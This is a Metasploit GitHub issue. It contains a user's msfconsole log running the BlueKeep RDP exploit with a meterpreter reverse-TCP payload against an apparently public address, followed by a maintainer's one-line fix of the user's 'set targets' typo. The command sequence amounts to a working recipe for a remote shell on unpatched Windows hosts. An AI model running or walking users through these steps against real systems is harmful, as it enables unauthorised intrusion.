rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.79k stars 13.9k forks source link

failure: bad-config windows/rdp/cve_2019_0708_bluekeep_rce #12338

Closed MrMad0x0 closed 5 years ago

MrMad0x0 commented 5 years ago

[*] Started reverse TCP handler on 192.168..:4444 [+] 203.**..*:3389 - The target is vulnerable. [-] 203...:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually [] Exploit completed, but no session was created. msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 203.203...* RHOSTS => 203...* msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST 192.168.*. LHOST => 192.168..* msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4444 LPORT => 4444 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show TARGETS show targets
Exploit targets:

Id Name


0 Automatic targeting via fingerprinting 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V) msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set targets 1 targets => 1 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Started reverse TCP handler on 192.168..:4444 [+] 203.**..*:3389 - The target is vulnerable. [-] 203...:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually [] Exploit completed, but no session was created. msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set targets 2 targets => 2 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

[*] Started reverse TCP handler on 192.168..:4444 [+] 203.**..*:3389 - The target is vulnerable. [-] 203...:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually [] Exploit completed, but no session was created. I'm Try All Targets 1-2-3-4-0 But Same Problem

busterb commented 5 years ago

You typed set targets, not set target